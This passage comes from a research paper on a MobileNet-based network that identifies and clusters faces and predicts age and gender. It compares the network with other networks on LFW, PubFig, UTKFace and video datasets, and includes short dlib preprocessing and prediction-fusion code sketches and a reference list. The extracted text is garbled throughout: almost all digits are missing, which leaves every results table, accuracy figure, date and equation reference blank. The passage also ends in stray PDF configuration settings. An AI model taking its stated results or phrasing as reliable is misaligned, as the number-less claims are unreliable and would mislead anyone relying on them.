in unsupervised environment, it is important to analyze the quality of face identification of the proposed model. thus, in the last experiment of this subsection i deal with the lfw dataset (learned- miller et al., ) and pubfig dataset (pinto et al., ). i took , photos of , persons from lfw with more than one photo. all , photos of c = identities from pubfig were considered. the datasets are divided randomly times into the training and testing sets, so that the ratio of the size r of the training set to the size of the whole dataset is equal to a fixed number. the rank- accuracy of the k-nn classifier for the proposed model in comparison with the state-of-the-art results for – train/test split of the lfw is shown in table . 
the results of the -times repeated random sub-sampling cross validation of the k-nn classifier (savchenko, ) for several publicly available convnets in dependence of the number of photos of each subject are presented in table . here the model size of each convnet and average inference time on cpu of macbook pro ( gb ram, intel core i . ghz) are additionally presented. here one could notice that the proposed simple network provides competitive results with the state-of-the-art solutions though its size is approximately . -times lower than the table rank- accuracy (%) in face identification for lfw dataset. convnet rank- accuracy cots-s +s (best-rowden et al., ) . deepface (taigman et al., ) . vggface (vggnet- ) (parkhi, vedaldi & zisserman, ) . arcface (deng et al., ) . viplfacenetfull (liu et al., a) . light cnn (c) (wu et al., ) . deepid + (sun et al., ) . deepid (sun et al., ) . idl ensemble (liu et al., ) . facenet (inceptionresnet+softmax loss) (schroff, kalenichenko & philbin, ) . vggface (resnet- ) (cao et al., ) . proposed model . table results of face identification for pubfig dataset. convnet rank- accuracy (%) model size (mb) inference time (ms) number of photos per subject light cnn (c) . ± . . ± . . ± . . . vggface (vggnet- ) . ± . . ± . . ± . . . vggface (resnet- ) . ± . . ± . . ± . . . proposed model . ± . . ± . . ± . . . savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ size of the deep resnet- trained on vggface dataset (cao et al., ). the inference time in the mobilenet is also known to be much lower. age and gender recognition in this subsection, the proposed model is compared with publicly available convnets for age/gender prediction: � deep expectation (dex) vgg network trained on the imdb-wiki dataset (rothe, timofte & van gool, ) � wide resnet (zagoruyko & komodakis, ) (weights. - . ) (https://github.com/ yu u/age-gender-estimation) � wide resnet (weights. - . ) (https://github.com/tony /keras_age_gender) � facenet (schroff, kalenichenko & philbin, ) (https://github.com/boyuanjiang/age- gender-estimate-tf) � bknetstyle (https://github.com/truongnmt/multi-task-learning) � ssrnet (yang et al., ) (https://github.com/shamangary/ssr-net) � mobilenet v (agegendernet) (https://github.com/dandynaufaldi/agendernet) � two models from insightface (deng et al., ): original resnet- and “new” fast convnet (https://github.com/deepinsight/insightface/) � inception v (https://github.com/dpressel/rude-carnie) fine-tuned on the adience dataset (eidinger, enbar & hassner, ) � age_net/gender_net (levi & hassner, ) trained on the adience dataset (eidinger, enbar & hassner, ). in contrast to the proposed approach, all these models have been trained only on specific datasets with age and gender labels, that is, they are fine-tuned from traditional convnets pre-trained on imagenet- and do not use large-scale face recognition datasets. in addition, several special cases of the mobilenet-based model (fig. ) were examined. firstly, i compressed this model using standard tensorflow quantization graph transforms. secondly, all layers of the proposed model were fine-tuned for age and gender predictions (hereinafter “proposed mobilenet, fine-tuned”). 
though such tuning obviously reduce the accuracy of face identification with identity features at the output of the base mobilenet, it caused an above-mentioned increase of validation accuracies for gender and age classification thirdly, in order to compare the proposed multi-output neural network (fig. ) with conventional approach, i additionally used the same mobilenet-based network but with a single head, which was pre-trained on the same vggface face recognition problem and then fine-tuned for one task (age or gender recognition), that is, there are two different models (hereinafter “mobilenet with single head”) for all these tasks. finally, it was decided to measure the influence of pre-training on face recognition task. hence, the model (fig. ) was fine-tuned using the above- mentioned procedure and the same training set with labeled age and gender, but the base savchenko ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/yu u/age-gender-estimation https://github.com/yu u/age-gender-estimation https://github.com/tony /keras_age_gender https://github.com/boyuanjiang/age-gender-estimate-tf https://github.com/boyuanjiang/age-gender-estimate-tf https://github.com/truongnmt/multi-task-learning https://github.com/shamangary/ssr-net https://github.com/dandynaufaldi/agendernet https://github.com/deepinsight/insightface/ https://github.com/dpressel/rude-carnie http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mobilenet was pre-trained on conventional imagenet- dataset rather than on vggface (cao et al., ). though such network (hereinafter “proposed mobilenet, fine-tuned from imagenet”) cannot be used in facial clustering, it can be applied in gender and age prediction tasks. i run the experiments on the msi gp re laptop (cpu: xintel core i . ghz, ram: gb, gpu: nvidia geforce gtx ) and two mobile phones, namely: ( ) honor c pro (cpu: mt � ghz and � . ghz, ram: gb); and ( ) samsung s + (cpu: � . ghz mongoose m and � . ghz cortex-a , ram: gb). the size of the model file and average inference time for one facial image are presented in table . as expected, the mobilenets are several times faster than the deeper convolutional networks and require less memory to store their weights. though the quantization reduces the model size in four times, it does not decrease the inference time. finally, though the computing time for the laptop is significantly lower when compared to the inference on mobile phones, their modern models (“mobile phone ”) became all the more suitable for offline image recognition. in fact, the proposed model requires only – ms to extract facial identity features and predict both age and gender, which makes it possible to run complex analytics of facial albums on device. in the next experiments the accuracy of the proposed models were estimated in gender recognition and age prediction tasks. at first, i deal with university of tennessee, knoxville face dataset (utkface) (zhang, song & qi, ). the images from complete (“in the wild”) set were pre-processed using the following procedure from the above-mentioned agegendernet resource (https://github.com/dandynaufaldi/ agendernet): faces are detected and aligned with margin . using get_face_chip function from dlib. next, all images which has no single face detected, are removed. the rest , images are scaled to the same size � . in order to estimate the accuracy of age prediction, eight age ranges from the adience dataset (eidinger, enbar & hassner, ) were used. 
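the preprocessing described above can be approximated with dlib in a few lines; the padding value, chip size and landmark model file are placeholders in this sketch, since the exact margin used in the experiments is not reproduced here.

```python
# sketch of the dlib-based face detection and alignment used to preprocess the images.
import dlib

detector = dlib.get_frontal_face_detector()
landmarks_model = dlib.shape_predictor("shape_predictor_5_face_landmarks.dat")  # assumed model file

def aligned_face_chip(img, size=224, padding=0.4):
    """returns one aligned face chip, or None when no single face is detected
    (such images are removed from the evaluation set)."""
    detections = detector(img, 1)
    if len(detections) != 1:
        return None
    landmarks = landmarks_model(img, detections[0])
    return dlib.get_face_chip(img, landmarks, size=size, padding=padding)
```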
if the predicted and real age are included into the same range, then the recognition is assumed to be correct. the results are shown in table . in contrast to the previous experiment (table ), here the inference time is measured on the laptop’s gpu. in this experiment the proposed convnets (three last lines in table ) have higher accuracy of age/gender recognition when compared to the available models trained only on specific datasets, for example, imdb-wiki or adience. for example, the best fine-tuned mobilenet provided . – % higher accuracy of gender classification. the gain in age prediction performance is even more noticeable: i obtain . – years less mae (mean table performance analysis of convnets. convnet model size (mb) average cpu inference time (ms) laptop mobile phone mobile phone age_net/gender_net . , dex . , proposed mobilenet . proposed mobilenet, quantized . savchenko ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/dandynaufaldi/agendernet https://github.com/dandynaufaldi/agendernet http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ absolute error) and – % higher accuracy. though the gender recognition accuracy of a convnet with single head is rather high, multi-task learning causes a noticeable decrease in age prediction quality (up to . % and . % differences in mae accuracy). hence, the proposed approach is definitely more preferable if both age and gender recognition tasks are solved due to the twice-lower running time when compared to the usage of separate age and gender networks. it is interesting that though there exist models with lower size, for example, ssrnet (yang et al., ) or new insightface-based model (deng et al., ), the proposed convnet provides the fastest inference, which can be explained by special optimization of hardware for such widely used architectures as mobilenet. it is known that various image preprocessing algorithms could drastically influence the recognition performance. hence, in the next experiment conventional set of all , images from “aligned & cropped faces” provided by the authors of the utkface was used. the results of the same models are presented in table . the difference in image pre-processing causes significant decrease of the accuracies of most models. for example, the best proposed model in this experiment has – % and – % higher age and gender recognition accuracy, respectively. its age prediction mae is at least . years lower when compared to the best publicly available model from insight face. the usage of the same dlib library to detect and align faces in a way, which is only slightly different from the above-mentioned preprocessing pipeline, drastically decreases the accuracy of the best existing model from previous experiment (mobilenet v ) up to . % gender accuracy and years in age prediction mae. obviously, such dependence of performance on the image pre-processing algorithm makes the model inappropriate for practical applications. hence, this experiment clearly demonstrates how table age and gender recognition results for preprocessed utkface (in the wild) dataset. models gender accuracy (%) age mae age accuracy (%) model size (mb) inference time (ms) dex . . . , . . wide resnet (weights. - . ) . . . . . wide resnet (weights. - . ) . . . . . facenet . . . . . bknetstyle . . . . . ssrnet . . . . . mobilenet v (agegendernet) . . . . . resnet- from insightface . . . . . “new” model from insightface . . . . . inception trained on adience . – . . . age_net/gender_net . – . . . 
mobilenets with single head . . . . . proposed mobilenet, fine-tuned from imagenet . . . . . proposed mobilenet, pre-trained on vggface . . . . . proposed mobilenet, fine-tuned . . . . . savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the proposed model exploits the potential of very large face recognition dataset to learn face representation in contrast to the training only on rather small and dirty datasets with age and gender labels. it is important to emphasize that the same statement is valid even for the proposed model (fig. ). in particular, the usage of face identification features pre-trained on vggface leads to . % and . % lower error rate of age and gender classification, respectively, when compared to conventional fine-tuning of mobilenet, which has been preliminarily trained on imagenet- only (third last line in table ). this difference in error rates is much more noticeable when compared to the previous experiment (table ), especially for age prediction mae. many recent papers devoted to utkface dataset split it into the training and testing sets and fine-tune the models on such training set (das, dantcheva & bremond, ). though the proposed convnet does not require such fine-tuning, its results are still very competitive. for example, i used the testing set described in the paper (cao, mirjalili & raschka, ), which achieves the-state-of-the-art results on a subset of utkface if only , photos of persons from the age ranges are taken into the testing set. the proposed model achieves . % gender recognition accuracy and age prediction mae . . it is lower than . mae of the best coral-cnn model from this paper, which was additionally trained on other subset of utkface. as the age and gender recognition is performed in the proposed pipeline (fig. ) for a set of facial images in a cluster, it was decided to use the known video datasets with age/gender labels in the next experiments in order to test performance of classification of a set of video frames (kharchevnikova & savchenko, ): � eurecom kinect (min, kose & dugelay, ), which contains nine photos for each of subjects ( women and men). table age and gender recognition results for utkface (aligned and cropped faces) dataset. models gender accuracy (%) age mae age accuracy (%) dex . . . wide resnet (weights. - . ) . . . wide resnet (weights. - . ) . . . facenet . . . bknetstyle . . . ssrnet . . . mobilenet v (agegendernet) . . . resnet- from insightface . . . “new” model from insightface . . . inception trained on adience . – . age_net/gender_net . – . mobilenets with single head . . . proposed mobilenet, fine-tuned from imagenet . . . proposed mobilenet, pre-trained on vggface . . . proposed mobilenet, fine-tuned . . . savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � indian movie face database (imfdb) (setty et al., ) with video clips of males and females. only four age categories are available: “child” ( – years old), “young” ( – ), “middle”: ( – ), and “old” ( +). � acted facial expressions in the wild (afew) from the emotiw (emotions recognition in the wild) audio–video emotional sub-challenge (klare et al., ). it contains , video files. the facial regions were detected using the mtcnn (zhang et al., a). � iarpa janus benchmark a (dhall et al., ) with more than , total frames of , video tracks. only gender information is available in this dataset. 
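before turning to the video experiments, the frame-level aggregation strategies compared below, namely simple voting and the expected value ( ) over the top-l age outputs (the product rule was already sketched after eq. ( )), can be written down as follows; the number of selected outputs is a placeholder of this sketch.

```python
# sketch of per-frame prediction fusion for a video track or a facial cluster.
import numpy as np

def simple_voting(posteriors):
    """majority vote over the per-frame argmax decisions; `posteriors` has shape (M, N)."""
    return int(np.bincount(np.argmax(posteriors, axis=1)).argmax())

def expected_age(posteriors, class_ages, top_l=3):
    """expected value ( ) computed from the top-L age outputs of each frame and then
    averaged over frames; `class_ages` holds the age value of every output class."""
    class_ages = np.asarray(class_ages)
    per_frame = []
    for p in posteriors:
        idx = np.argsort(p)[-top_l:]  # indices of the L maximal outputs
        per_frame.append(np.sum(class_ages[idx] * p[idx]) / np.sum(p[idx]))
    return float(np.mean(per_frame))
```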
in video-based gender recognition a gender of a person on each video frame is firstly classified. after that two simple fusion strategies are utilized, namely, simple voting, and the product rule ( ). the obtained accuracies of the proposed models compared to most widely used dex (rothe, timofte & van gool, ) and gender_net/age_net (levi & hassner, ) are shown in table . here again the proposed models are much more accurate than the publicly available convnets trained only on rather small and dirty datasets with age/gender labels. it is important to emphasize that the gender output of the proposed network was trained on the same imdb-wiki dataset as the dex network (rothe, timofte & van gool, ). however, the error rate in the proposed approach is much lower when compared to the dex. it can be explained by the pre-training of the base mobilenet on face identification task with very large dataset, which helps to learn rather good facial representations. such pre-training differs from traditional usage of imagenet weights and only fine-tune the cnn on a specific dataset with known age and gender labels. secondly, the usage of product rule generally leads to – % decrease of the error rate when compared to the simple voting. thirdly, the fine-tuned version of the proposed model achieves the lowest error rate only for the kinect dataset and is – % less accurate in other cases. it is worth noting that the best accuracy for eurecom kinect dataset is % higher than the best-known accuracy ( . %) achieved by huynh, min & dugelay ( ) in similar settings without analysis of depth images. fourthly, though the compression of the convnet makes it possible to drastically reduce the model size (table ), it is characterized by up to % decrease of the recognition rate. finally, conventional single-output model is slightly less accurate than the proposed network, though the difference in the error rate is not statistically significant. in the last experiment the results for age predictions are presented (table ). as the training set for the proposed network differs with conventional dex model due to addition of the adience data to the imdb-wiki dataset, it was decided to repeat training of the proposed network (fig. ) with the imdb-wiki data only. hence, the resulted “proposed mobilenet, imdb-wiki only” convnet is more fairly compared with the dex network. here it was assumed that age is recognized correctly for the kinect and afew datasets (with known age) if the difference between real and predicted age is not greater than years. the fusion of age predictions of individual video frames is implemented savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table video-based age prediction accuracy, %. convnet aggregation eurecom kinect imfdb afew age_net simple voting product rule expected value dex simple voting product rule expected value mobilenet with single head simple voting product rule expected value proposed mobilenet, imdb-wiki only simple voting product rule expected value proposed mobilenet, imdb-wiki+adience simple voting product rule expected value proposed mobilenet, quantized simple voting product rule expected value proposed mobilenet, fine-tuned simple voting product rule expected value note: the highest accuracies for each dataset are marked by bold. table video-based gender recognition accuracy, %. 
convnet aggregation eurecom kinect imfdb afew ijb-a gender_net simple voting product rule dex simple voting product rule mobilenet with single head simple voting product rule proposed mobilenet simple voting product rule proposed mobilenet, quantized simple voting product rule proposed mobilenet, fine-tuned simple voting product rule note: the highest accuracies for each dataset are marked by bold. savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ by: ( ) simple voting, ( ) maximizing the product of age posterior probabilities ( ), and ( ) averaging the expected value ( ) with choice of l = top predictions in each frame. one can notice that the proposed models are again the most accurate in practically all cases. the accuracy of the dex models are comparable with the proposed convnets only for the afew dataset. this gain in the error rate cannot be explained by using additional adience data, as it is noticed even for the “proposed mobilenet, imdb-wiki only” model. secondly, the lowest error rates are obtained for the computation of the expected value of age predictions. for example, it is % and % more accurate than the simple voting for the kinect and afew data. the effect is especially clear for the imfdb images, in which the expected value leads to up to % higher recognition rate. conclusions in this paper i proposed an approach to organizing photo and video albums (fig. ) based on a simple extension of mobilenet (fig. ), in which the facial representations suitable for face identification, age, and gender recognition problems are extracted. the main advantage of the proposed model is the possibility to solve all three tasks simultaneously without need for additional convnets. as a result, a very fast facial analytic system was implemented (table ), which can be installed even on mobile devices (fig. ). it was shown that the proposed approach extracts facial clusters rather accurately when compared to the known models (tables and ). moreover, the known state-of-the-art bcubed f-measure for very complex gfw data was slightly improved (table ). more importantly, the results for age and gender predictions using extracted facial representations significantly outperform the results of the publicly available neural networks (tables and ). the state-of-the-art results on the whole utkface dataset (zhang, song & qi, ) was achieved ( . % gender recognition accuracy, . age prediction mae) for the convnets which are not fine-tuned on a part of this dataset. the proposed approach does not have the limitations of existing methods of simultaneous face analysis (ranjan, patel & chellappa, ; yoo et al., ) for usage in face identification and clustering tasks because it firstly learns the facial representations using external very large face recognition dataset. the proposed approach is usable even for face identification with small training samples, including the most complex case, namely, a single photo per individual. furthermore, the method enables to apply the convnet in completely unsupervised environments for face clustering, given only a set of photos from a mobile device. finally, the training procedure to learn parameters of the method alternately trains all the facial attribute recognition tasks using batches of different training images. hence, the training images are not required to have all attributes available. 
as a result, much more complex (but still fast) network architectures can be trained when compared to the convnet of (yoo et al., ) and, hence, achieve very high age/gender recognition accuracy and the face clustering quality comparable to very deep state-of-the-art convnets. in future works it is necessary to deal with the aging problem. in fact, the average linkage clustering usually produces several groups for the same person (especially, a child). savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the single linkage clustering can resolve this issue if there are photos of the same subject made over the years. unfortunately, the performance of the single linkage is rather poor when compared to another agglomerative clustering methods (tables – ). an additional research direction is a thorough analysis of distance measures in the facial clustering (zhu, wen & sun, ); that is, the usage of distance learning (zhu et al., ) or special regularizers (savchenko & belova, ). it is also important to extend the proposed approach to classify other facial attributes, for example, race/ethnicity (zhang, song & qi, ) or emotions (rassadin, gruzdev & savchenko, ). finally, though the main purpose of this paper was to provide an efficient convnet suitable for multiple tasks including extraction of good face representations, the quality of grouping faces could be obviously improved by replacement of agglomerative clustering to contemporary clustering techniques with unknown number of clusters (he et al., ; zhang et al., b; shi, otto & jain, ; vascon et al., ). additional information and declarations funding this research was supported by samsung research and samsung electronics. additionally, this research was prepared within the framework of the basic research program at the national research university higher school of economics (hse) in return for lab time. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: samsung research and samsung electronics. basic research program at the national research university higher school of economics. competing interests andrey v. savchenko is an employee of the samsung-pdmi joint ai center, st. petersburg department of steklov institute of mathematics russian academy of sciences and of the national research university higher school of economics. author contributions � andrey v. savchenko conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: source code and neural network models are publicly available at github: https://github.com/hse-asavchenko/hse_facerec_tf/tree/master/age_gender_identity. savchenko ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/hse-asavchenko/hse_facerec_tf/tree/master/age_gender_identity http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ references aggarwal cc, reddy ck. . data clustering: algorithms and applications. boca raton: crc press. antipov g, baccouche m, berrani s-a, dugelay j-l. . 
effective training of convolutional neural networks for face-based gender and age prediction. pattern recognition : – doi . /j.patcog. . . . best-rowden l, han h, otto c, klare bf, jain ak. . unconstrained face recognition: identifying a person of interest from a media collection. ieee transactions on information forensics and security ( ): – doi . /tifs. . . cao w, mirjalili v, raschka s. . consistent rank logits for ordinal regression with convolutional neural networks. arxiv available at http://arxiv.org/abs/ . . cao q, shen l, xie w, parkhi om, zisserman a. . vggface : a dataset for recognising faces across pose and age. in: proceedings of the international conference on automatic face & gesture recognition (fg ). piscataway: ieee, – . choi se, lee yj, lee sj, park kr, kim j. . age estimation using a hierarchical classifier based on global and local facial features. pattern recognition ( ): – doi . /j.patcog. . . . crosswhite n, byrne j, stauffer c, parkhi o, cao q, zisserman a. . template adaptation for face verification and identification. in: proceedings of the international conference on automatic face & gesture recognition (fg ). piscataway: ieee, – . das a, dantcheva a, bremond f. . mitigating bias in gender, age and ethnicity classification: a multi-task convolution neural network approach. in: european conference on computer vision. munich: springer, – . deng j, guo j, niannan x, zafeiriou s. . arcface: additive angular margin loss for deep face recognition. in: proceedings of the ieee conference on computer vision and pattern recognition (cvpr). piscataway: ieee. dhall a, goecke r, lucey s, gedeon t. . collecting large, richly annotated facial-expression databases from movies. ieee multimedia ( ): – doi . /mmul. . . eidinger e, enbar r, hassner t. . age and gender estimation of unfiltered faces. ieee transactions on information forensics and security ( ): – doi . /tifs. . . gallagher ac, chen t. . clothing cosegmentation for recognizing people. in: proceedings of the international conference on computer vision and pattern recognition (cvpr). piscataway: ieee, – . goodfellow i, bengio y, courville a. . deep learning. cambridge, london: mit press. guo y, zhang l. . one-shot face recognition by promoting underrepresented classes. available at http://arxiv.org/abs/ . . han h, jain ak, wang f, shan s, chen x. . heterogeneous face attribute estimation: a deep multi-task learning approach. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . he y, cao k, li c, loy cc. . merge or not? learning to group faces via imitation learning. available at http://arxiv.org/abs/ . . howard ag, zhu m, chen b, kalenichenko d, wang w, weyand t, andreetto m, adam h. . mobilenets: efficient convolutional neural networks for mobile vision applications. available at http://arxiv.org/abs/ . . savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /tifs. . http://arxiv.org/abs/ . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /mmul. . http://dx.doi.org/ . /tifs. . http://arxiv.org/abs/ . http://dx.doi.org/ . /tpami. . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ huynh t, min r, dugelay j-l. . an efficient lbp-based descriptor for facial depth images applied to gender recognition using rgb-d face data. in: asian conference on computer vision. daejeon: springer, – . kaya h, gürpnar f, salah aa. . 
video-based emotion recognition in the wild using deep transfer learning and score fusion. image and vision computing : – doi . /j.imavis. . . . kharchevnikova as, savchenko av. . the video-based age and gender recognition with convolution neural networks. in: international conference on network analysis. nizhny novgorod: springer, – . kharchevnikova as, savchenko av. . neural networks in video-based age and gender recognition on mobile platforms. optical memory and neural networks ( ): – doi . /s x . kittler j, hatef m, duin rp, matas j. . on combining classifiers. ieee transactions on pattern analysis and machine intelligence ( ): – . klare bf, klein b, taborsky e, blanton a, cheney j, allen k, grother p, mah a, jain ak. . pushing the frontiers of unconstrained face detection and recognition: iarpa janus benchmark a. in: proceedings of the international conference on computer vision and pattern recognition (cvpr). boston: ieee, – . learned-miller e, huang gb, roychowdhury a, li h, hua g. . labeled faces in the wild: a survey. in: kawulok m, celebi m, smolka b, eds. advances in face detection and facial image analysis. cham: springer, – doi . / - - - - . levi g, hassner t. . age and gender classification using convolutional neural networks. in: proceedings of the ieee conference on computer vision and pattern recognition workshops (cvprw). piscataway: ieee, – . liu j, deng y, bai t, wei z, huang c. . targeting ultimate accuracy: face recognition via deep embedding. arxiv available at http://arxiv.org/abs/ . . liu x, kan m, wu w, shan s, chen x. a. viplfacenet: an open source deep face recognition sdk. frontiers of computer science ( ): – doi . /s - - - . liu w, wen y, yu z, li m, raj b, song l. b. sphereface: deep hypersphere embedding for face recognition. in: proceedings of the ieee conference on computer vision and pattern recognition (cvpr). vol. . piscataway: ieee. manju a, valarmathie p. . organizing multimedia big data using semantic based video content extraction technique. in: proceedings of the international conference on soft-computing and networks security (icsns). coimbatore: ieee, – . min r, kose n, dugelay j-l. . kinectfacedb: a kinect database for face recognition. ieee transactions on systems, man, and cybernetics: systems ( ): – doi . /tsmc. . . parkhi om, vedaldi a, zisserman a. . deep face recognition. in: proceedings of the british conference on machine vision (bmvc), swansea, uk, vol. . . pinto n, stone z, zickler t, cox d. . scaling up biologically-inspired computer vision: a case study in unconstrained face recognition on facebook. in: proceedings of cvprw. piscataway: ieee, – . ranjan r, patel vm, chellappa r. . hyperface: a deep multi-task learning framework for face detection, landmark localization, pose estimation, and gender recognition. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.imavis. . . http://dx.doi.org/ . /s x http://dx.doi.org/ . / - - - - http://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tsmc. . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rassadin a, gruzdev a, savchenko a. . group-level emotion recognition using transfer learning from face identification. in: proceedings of the th acm international conference on multimodal interaction (icmi). new york: acm, – . rothe r, timofte r, van gool l. . 
dex: deep expectation of apparent age from a single image. in: proceedings of the ieee international conference on computer vision workshops (cvprw). piscataway: ieee, – . savchenko av. . search techniques in intelligent classification systems. basel: springer. savchenko a. . efficient statistical face recognition using trigonometric series and cnn features. in: th international conference on pattern recognition (icpr). piscataway: ieee, – . savchenko av. . sequential three-way decisions in multi-category image recognition with deep features based on distance factor. information sciences : – doi . /j.ins. . . . savchenko av, belova ns. . unconstrained face identification using maximum likelihood of distances between deep off-the-shelf features. expert systems with applications : – doi . /j.eswa. . . . schroff f, kalenichenko d, philbin j. . facenet: a unified embedding for face recognition and clustering. in: proceedings of the ieee conference on computer vision and pattern recognition (cvpr), boston, massachusetts, usa, – . setty s, husain m, beham p, gudavalli j, kandasamy m, vaddi r, hemadri v, karure j, raju r, rajan b, kumar v, jawahar c. . indian movie face database: a benchmark for face recognition under wide variations. in: proceedings of the fourth national conference on computer vision, pattern recognition, image processing and graphics (ncvpripg). piscataway: ieee, – . sharif razavian a, azizpour h, sullivan j, carlsson s. . cnn features off-the-shelf: an astounding baseline for recognition. in: proceedings of conference on computer vision and pattern recognition workshops (cvprw). piscataway: ieee computer society, – . shi y, otto c, jain ak. . face clustering: representation and pairwise constraints. ieee transactions on information forensics and security ( ): – doi . /tifs. . . sokolova ad, kharchevnikova as, savchenko av. . organizing multimedia data in video surveillance systems based on face verification with convolutional neural networks. in: proceedings of the international conference on analysis of images, social networks and texts. moscow: springer, – . sun y, chen y, wang x, tang x. . deep learning face representation by joint identification- verification. in: advances in neural information processing systems, montreal, canada, – . sun y, liang d, wang x, tang x. . deepid : face recognition with very deep neural networks. arxiv available at http://arxiv.org/abs/ . . taigman y, yang m, ranzato m, wolf l. . deepface: closing the gap to human-level performance in face verification. in: proceedings of the conference on computer vision and pattern recognition (cvpr). piscataway: ieee, – . vascon s, cristani m, pelillo m, murino v. . using dominant sets for k-nn prototype selection. in: international conference on image analysis and processing. naples: springer, – . wang f, cheng j, liu w, liu h. . additive margin softmax for face verification. ieee signal processing letters ( ): – doi . /lsp. . . savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /tifs. . http://arxiv.org/abs/ . http://dx.doi.org/ . /lsp. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ wen y, zhang k, li z, qiao y. . a discriminative feature learning approach for deep face recognition. in: european conference on computer vision. amsterdam: springer, – . wu x, he r, sun z, tan t. . a light cnn for deep face representation with noisy labels. 
ieee transactions on information forensics and security ( ): – doi . /tifs. . . yang t-y, huang y-h, lin y-y, hsiu p-c, chuang y-y. . ssr-net: a compact soft stagewise regression network for age estimation. in: proceedings of the international joint conference on artificial intelligence (ijcai), stockholm, sweden, – . yoo b, namjoon k, changkyo l, choi ck, jaejoon h. . method and apparatus for recognizing object, and method and apparatus for training recognizer. us patent , , . available at https://patents.google.com/patent/ep a . zagoruyko s, komodakis n. . wide residual networks. arxiv available at http://arxiv.org/abs/ . . zhang yj, lu h. . a hierarchical organization scheme for video data. pattern recognition ( ): – doi . /s - ( ) - . zhang z, luo p, loy cc, tang x. b. joint face representation adaptation and clustering in videos. in: proceedings of the european conference on computer vision (eccv). amsterdam: springer, – . zhang z, song y, qi h. . age progression/regression by conditional adversarial autoencoder. in: proceedings of the ieee conference on computer vision and pattern recognition (cvpr). piscataway: ieee, – . zhang k, zhang z, li z, qiao y. a. joint face detection and alignment using multitask cascaded convolutional networks. ieee signal processing letters ( ): – doi . /lsp. . . zhu c, wen f, sun j. . a rank-order distance based clustering algorithm for face tagging. in: proceedings of the international conference on computer vision and pattern recognition (cvpr). colorado springs: ieee, – . zhu p, zhang l, zuo w, zhang d. . from point to set: extend the learning of distance metrics. in: proceedings of the international conference on computer vision (iccv). piscataway: ieee, – .
/colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . 
